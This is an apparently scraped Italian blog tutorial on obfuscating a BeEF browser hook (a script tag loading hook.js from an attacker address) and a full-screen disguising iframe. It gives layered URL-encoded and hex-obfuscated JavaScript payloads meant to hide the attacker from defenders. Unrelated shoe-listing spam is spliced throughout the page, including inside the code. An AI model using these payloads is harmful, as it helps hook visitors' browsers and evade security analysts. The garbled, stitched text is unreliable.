Ciabatta Nero Grunland Ce0118 Uomo Lino 46 KTJFl1c
Element Element Alta Uomo Alta PrestonSneaker Alta Uomo PrestonSneaker Marrone Marrone Element Uomo PrestonSneaker ZuXikOP

Innanzitutto offuscare il codice renderà il lavoro degli analisti Blue Team molto più complicato. Supponiamo di aver introdotto un gancio di BeeF nella nostra pagina malevola, non sarebbe bello se il gancio apparisse così:

<script src="http://90.Xx.1xX.44:3000/hook.js"></script>

Risulterebbe troppo semplice risalire all’attaccante. Naturalmente una cosa intelligente da fare è utilizzare un Proxy. Ma offuscare il codice è parte essenziale del processo di anonimato.

Immaginate la stessa stringa così (HTML Encrypter):

Ciabatta Nero Grunland Ce0118 Uomo Lino 46 KTJFl1c
document.write(unescape('%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%20%22%59%6f%75%72%20%49%50%22%20%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e'));

Oppure così (Javascript Obfuscator):

var _0xf735=["\x25\x33\x63\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x37\x33\x25\x37\x32\x25\x36\x33\x25\x33\x64\x25\x32\x32\x25\x36\x38\x25\x37\x34\x25\x37\x34\x25\x37\x30\x25\x33\x61\x25\x32\x66\x25\x32\x66\x25\x32\x30\x25\x32\x32\x25\x35\x39\x25\x36\x66\x25\x37\x35\x25\x37\x32\x25\x32\x30\x25\x34\x39\x25\x35\x30\x25\x32\x32\x25\x32\x30\x25\x33\x61\x25\x33\x33\x25\x33\x30\x25\x33\x30\x25\x33\x30\x25\x32\x66\x25\x36\x38\x25\x36\x66\x25\x36\x66\x25\x36\x62\x25\x32\x65\x25\x36\x61\x25\x37\x33\x25\x32\x32\x25\x33\x65\x25\x33\x63\x25\x32\x66\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x65","\x77\x72\x69\x74\x65"];document[_0xf735[1]](unescape(_0xf735[0]))

Facciamo un altro esempio. Stavolta applicheremo un Tag iFrame HTML per mimetizzare la nostra pagina malevola. Il codice è il seguente:

<iframe style="position: fixed; top: 0px; left: 0px; bottom: 0px; right: 0px; width: 100%; height: 100%; border: none; margin: 0; padding: 0; overflow: hidden; z-index: 999999;" src="http://example.com"> Your browser doesn't support iframes </iframe>

Questo codice crea una maschera con il sito di example.com. Se volete crearne uno adatto alle vostre esigenze, potete seguire questa guida “https://www.w3schools.com/tags/tag_iframe.asp“.  Adesso applichiamo il primo strato di offuscamento con HTML Encrypter :

<script type
="text/javascript">
document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%65%78%61%6d%70%6c%65%2e%63%6f%6d%27%20%73%74%79%6c%65%3d%27%20%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%3b%20%74%6f%70%3a%30%70%78%3b%20%6c%65%66%74%3a%30%70%78%3b%20%62%6f%74%74%6f%6d%3a%30%70%78%3b%20%72%69%67%68%74%3a%30%70%78%3b%20%77%69%64%74%68%3a%31%30%30%25%3b%20%68%65%69%67%68%74%3a%31%30%30%25%3b%20%62%6f%72%64%65%72%3a%6e%6f%6e%65%3b%20%6d%61%72%67%69%6e%3a%30%3b%20%70%61%64%64%69%6e%67%3a%30%3b%20%6f%76%65%72%66%6c%6f%77%3a%68%69%64%64%65%6e%3b%20%7a%2d%69%6e%64%65%78%3a%39%39%39%39%39%39%3b%27%3e%20%59%6f%75%72%20%62%72%6f%77%73%65%72%20%64%6f%65%73%6e%27%74%20%73%75%70%70%6f%72%74%20%69%66%72%61%6d%65%73%20%3c%2f%69%66%72%61%6d%65%3e')); </script>

E poi facendo copia e incolla del primo strato, applicate il secondo strato con Javascript Obfuscator :

<script>

Ciabatta Nero Grunland Ce0118 Uomo Lino 46 KTJFl1cvar _0xa8ce=["\x25\x33\x63\x25\x36\x39\x25\x36\x36\x25\x37\x32\x25\x36\x31\x25\x36\x64\x25\x36\x35\x25\x32\x30\x25\x37\x33\x25\x37\x32\x25\x36\x33\x25\x33\x64\x25\x32\x37\x25\x36\x38\x25\x37\x34\x25\x37\x34\x25\x37\x30\x25\x33\x61\x25\x32\x66\x25\x32\x66\x25\x36\x35\x25\x37\x38\x25\x36\x31\x25\x36\x64\x25\x37\x30\x25\x36\x63\x25\x36\x35\x25\x32\x65\x25\x36\x33\x25\x36\x66\x25\x36\x64\x25\x32\x37\x25\x32\x30\x25\x37\x33\x25\x37\x34\x25\x37\x39\x25\x36\x63\x25\x36\x35\x25\x33\x64\x25\x32\x37\x25\x32\x30\x25\x37\x30\x25\x36\x66\x25\x37\x33\x25\x36\x39\x25\x37\x34\x25\x36\x39\x25\x36\x66\x25\x36\x65\x25\x33\x61\x25\x36\x36\x25\x36\x39\x25\x37\x38\x25\x36\x35\x25\x36\x34\x25\x33\x62\x25\x32\x30\x25\x37\x34\x25\x36\x66\x25\x37\x30\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x36\x63\x25\x36\x35\x25\x36\x36\x25\x37\x34\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x36\x32\x25\x36\x66\x25\x37\x34\x25\x37\x34\x25\x36\x66\x25\x36\x64\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x37\x32\x25\x36\x39\x25\x36\x37\x25\x36\x38\x25\x37\x34\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x37\x37\x25\x36\x39\x25\x36\x34\x25\x37\x34\x25\x36\x38\x25\x33\x61\x25\x33\x31\x25\x33\x30\x25\x33\x30\x25\x32\x35\x25\x33\x62\x25\x32\x30\x25\x36\x38\x25\x36\x35\x25\x36\x39\x25\x36\x37\x25\x36\x38\x25\x37\x34\x25\x33\x61\x25\x33\x31\x25\x33\x30\x25\x33\x30\x25\x32\x35\x25\x33\x62\x25\x32\x30\x25\x36\x32\x25\x36\x66\x25\x37\x32\x25\x36\x34\x25\x36\x35\x25\x37\x32\x25\x33\x61\x25\x36\x65\x25\x36\x66\x25\x36\x65\x25\x36\x35\x25\x33\x62\x25\x32\x30\x25\x36\x64\x25\x36\x31\x25\x37\x32\x25\x36\x37\x25\x36\x39\x25\x36\x65\x25\x33\x61\x25\x33\x30\x25\x33\x62\x25\x32\x30\x25\x37\x30\x25\x36\x31\x25\x36\x34\x25\x36\x34\x25\x36\x39\x25\x36\x65\x25\x36\x37\x25\x33\x61\x25\x33\x30\x25\x33\x62\x25\x32\x30\x25\x36\x66\x25\x37\x36\x25\x36\x35\x25\x37\x32\x25\x36\x36\x25\x36\x63\x25\x36\x66\x25\x37\x37\x25\x33\x61\x25\x36\x38\x25\x36\x39\x25\x36\x34\x25\x36\x34\x25\x36\x35\x25\x36\x65\x25\x33\x62\x25\x32\x30\x25\x37\x61\x25\x32\x64\x25\x36\x39\x25\x36\x65\x25\x36\x34\x25\x36\x35\x25\x37\x38\x25\x33\x61\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x62\x25\x32\x37\x25\x33\x65\x25\x32\x30\x25\x35\x39\x25\x36\x66\x25\x37\x35\x25\x37\x32\x25\x32\x30\x25\x36\x32\x25\x37\x32\x25\x36\x66\x25\x37\x37\x25\x37\x33\x25\x36\x35\x25\x37\x32\x25\x32\x30\x25\x36\x34\x25\x36\x66\x25\x36\x35\x25\x37\x33\x25\x36\x65\x25\x32\x37\x25\x37\x34\x25\x32\x30\x25\x37\x33\x25\x37\x35\x25\x37\x30\x25\x37\x30\x25\x36\x66\x25\x37\x32\x25\x37\x34\x25\x32\x30\x25\x36\x39\x25\x36\x36\x25\x37\x32\x25\x36\x31\x25\x36\x64\x25\x36\x35\x25\x37\x33\x25\x32\x30\x25\x33\x63\x25\x32\x66\x25\x36\x39\x25\x36\x36\x25\x37\x32\x25\x36\x31\x25\x36\x64\x25\x36\x35\x25\x33\x65","\x77\x72\x69\x74\x65"];document[_0xa8ce[1]](unescape(_0xa8ce[0]))

</script>

Adesso abbiamo un codice iFrame di cammuffamento con due strati di Offuscamento!

Ciabatta Nero Grunland Ce0118 Uomo Lino 46 KTJFl1c

Potrebbe anche interessarti

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.Ciabatta Nero Grunland Ce0118 Uomo Lino 46 KTJFl1c I campi obbligatori sono contrassegnati *

 =  2